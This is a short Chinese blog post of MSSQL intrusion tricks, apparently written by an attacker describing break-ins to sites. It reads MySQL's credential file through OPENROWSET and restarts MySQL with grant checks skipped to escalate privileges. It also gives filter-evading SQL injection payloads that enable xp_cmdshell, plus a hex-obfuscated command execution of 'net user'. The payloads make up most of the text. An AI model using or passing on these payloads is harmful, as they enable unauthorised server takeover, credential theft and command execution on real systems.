MSSQL 小技巧

Title:MSSQL 小技巧  --2012-12-31 11:29

1.

某日一个MSSQL 2008降权,想用MYSQL 3306外联提权,无ROOT密码,遂读取MYSQL文件,导出。

MSSQL 读取二进制/EXE/dat等文件

参考 http://hi.baidu.com/_ccsec/item/be4f68481bf3c8ba61d7b90e

 

--drop table tbldata;

--Create table tblData(FileId int,FileData varbinary(max));

--Insert into tblData (FileId, FileData) SELECT 1, BulkColumn FROM OPENROWSET(BULK N'C:\Program Files\MySQL\MySQL Server 5.5\data\mysql\user.frm', SINGLE_BLOB) AS Document;

--select * from tbldata

 

<1>

cd "C:\Program Files\MySQL\MySQL Server 5.5\bin"

mysqld.exe --skip-grant-tables

<2>

读取三文件,修改为其他表名,查询之...

 

2.

某日鼓捣某站,MSSQL 2005,SA权限,遂开启XP_CMDSHELL,但是XP_CMDSHELL作为关键字被拦截,测试可以简写开启,绕过...

//能够匹配成xp_cmdshell即可...

以下两种不同的方法:

<1>

ExECuTe/**/sp_configure/**/'show%%advanced%%options',/**/1;RECONFIGURE;eXeCuTe/**/sp_configure/**/'xp_cMd%',/**/1;RECONFIGURE;--

ExECuTe/**/sp_configure/**/'show%%%%%%advanced%%%%%options',/**/1;RECONFIGURE;eXeCuTe/**/sp_configure/**/'%%%%%%%%xp_cMd%%%%%%',/**/1;RECONFIGURE;--

ExECuTe/**/sp_configure/**/'show%%advanced%%options',/**/1;RECONFIGURE;eXeCuTe/**/sp_configure/**/'xp_cMd%el%',/**/1;RECONFIGURE;--

MSSQL 小技巧_第1张图片

<2>//这个是常用的...

declare/**/@a/**/varchar(100)/**/set/**/@a=0x6d61737465722e64626f2e78705f636d647368656c6c declare @b varchar(20)set @b=0x6e65742075736572;eXEC/**/@a/**/@b

 

你可能感兴趣的:(MSSQL)